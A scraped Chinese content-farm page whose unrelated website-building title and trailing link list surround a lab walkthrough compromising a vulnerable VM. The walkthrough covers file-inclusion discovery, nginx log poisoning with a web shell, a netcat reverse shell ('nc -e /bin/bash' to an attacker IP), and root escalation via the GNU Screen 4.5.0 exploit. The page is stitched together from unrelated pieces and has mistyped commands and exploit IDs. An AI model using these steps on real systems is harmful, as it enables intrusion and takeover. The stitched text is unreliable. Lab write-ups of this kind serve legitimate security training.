当前位置: 首页 > news >正文

网站对服务器要求徐州自助建站软件

网站对服务器要求,徐州自助建站软件,asp做购物网站,linux wordpress 安装信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit#xff0c;数字发生变化。不断刷新的话#xff0c;数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看…信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit数字发生变化。不断刷新的话数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看数据返回包 不断重发数据发现footer不断变化感觉可能存在一个独立的脚本爆破目录查看一下 dirsearch -u 192.168.16.172 -i 200命令解释 dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令下面对该命令进行详细解释 dirsearch是一个目录扫描工具用于探测Web服务器上的目录和文件。-u 192.168.16.172指定要扫描的目标URL或IP地址。在这个示例中目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。-i 200指定要忽略的HTTP状态码。在这个示例中200 表示忽略返回状态码为200的响应。也就是说当目标返回200状态码时不会将其视为敏感路径或文件。 通过执行这条命令dirsearch 工具将发送不同的HTTP请求到目标URL并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。 浏览器访问192.168.16.172这个页面 刷新页面进行查看刷新页面后数字发生变化 将bp数据包中的GET请求更改为/thankyou.php?filefooter.php然后点击发送 再点击发送进行查看 可以确定这里可能存在文件包含漏洞 漏洞利用 再将访问路径改为/etc/passwd可以看到passwd文件 说明了程序代码再处理文件包含是没有严格控制我们可以把访问路径更改为木马文件 发现报了404未找到的错误 对于配置了nginx的网站无论网站有什么操作都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log中 /thankyou.php?file/var/log/nginx/access.log木马上传成功利用蚁剑进行连接 http://192.168.16.172/thankyou.php?file/var/log/nginx/access.log进行反弹shell kali进行监听 nc -lvvp 8848 #监听网段中所有8848端口利用蚁剑中的虚拟终端反弹shell到攻击机kali上 nc -e /bin/bash 192.168.16.176 8848再看kali已经连接到了 使用python脚本开启交互模式 python -c import pty;pty.spawn(/bin/bash)查看id发现只是普通用户的权限 权限提升 find / -user root -prem /4000 2/dev/null经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。 尝试用searchsploit搜索是否存在漏洞重新打开一个终端进行漏洞查找 searchsploit screen 4.5.0找出41154.sh的绝对路径 searchsploit -p linx/local/41151.sh查看文件内容 cat /usr/share/exploitdb/exploits/linux/local/41154.sh按照文件的说明可分为三部分将第一个框里内容保存为第一文件名为libhax.c然后使用黄色选取的命令编译编译结束会生成libhax.so文件。 第二个框里内容保存为rootshell.c文件使用黄色选区的命令编译编译结束后生成rootshell文件。 将第三个框里内容保存为第三个文件保存为run.sh 。 这个名字随意。 通过蚁剑把libhax.c和rootshell.c拖进靶机跟目录下的tmp目录下 在虚拟终端中对libhax.c和rootshell.c这两个文件进行编译 在蚁剑中点击文件管理进入根目录下的tmp目录进行刷新后编译的文件就出来了 然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中注意是 /tmp/ 那么原来的libhax.c和rootshell.c这两个文件可以删除了因为已经编译好了留着也没有价值 回到通过python得到的交互式的shell里切换到/tmp目录下 运行run.sh输入bash ./run.sh进行提权 通过查看id已知是root用户 进入/root查看是否有flag 总结 信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch 漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传查看日志反弹shellpython交互shell 提权find / -user root -perm /4000 2/dev/null#找到所有具有root权限的可执行文件searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞libhax.c和rootshell.c文件的编译 run.shbash ./run.sh 提权
http://www.pierceye.com/news/957531/

相关文章:

  • 怎么管理好自己的网站自建vps和买机场哪个好
  • 站长之家素材网站郴州建网站
  • 服装微商城网站建设贵州建设考试网站
  • 安徽省建设安全协会网站htm5移动网站开发
  • 棋盘游戏类网站开发wordpress副标题怎么写
  • 重庆城市关键词优化ppt
  • 网站营销外包公司简介wordpress 微信二维码
  • 做酒业网站的要求软件开发app的公司
  • 可以做超链接或锚文本的网站有哪些口碑营销的本质是什么
  • 网上下载的网站模板怎么用莱芜金点子招聘网
  • 网站建设首先要免费游戏网站制作
  • 小橘子被做h网站注册帐号
  • 汉川网站推广服务PHP网站建设的课后笔记
  • 中国建设银行网站功能模块多少钱才算有钱人
  • 毕业设计网站成品wordpress 发布模块
  • 网站推广 济南江西 网站 建设 开发
  • 视频 播放网站怎么做的ppt模板大师
  • 桂林北站到象鼻山景区怎么坐车wordpress更改上传
  • 温州制作手机网站wordpress电子书下载
  • 企业型网站怎么做wordpress邮件服务器
  • 龙华网站(建设信科网络)网站建设哪家好推荐万维科技
  • 克拉玛依网站建设公司网站 正在建设中
  • 虚拟主机可以做视频网站嘛有哪些网站有收录做红酒的商行
  • 广州seo优化推广外贸网站优化谷歌关键词排名
  • 网络服务网站建设网站策划书包括哪些内容?
  • ps学做翻页相册网站wordpress导航图标
  • 模板网站的弊端在哪杨家平网站建设
  • 网站模板带手机站手表网站十大品牌
  • 物流网站功能设计师招聘网站有哪些
  • 知名网站开发哪里有重庆公司网站建设价格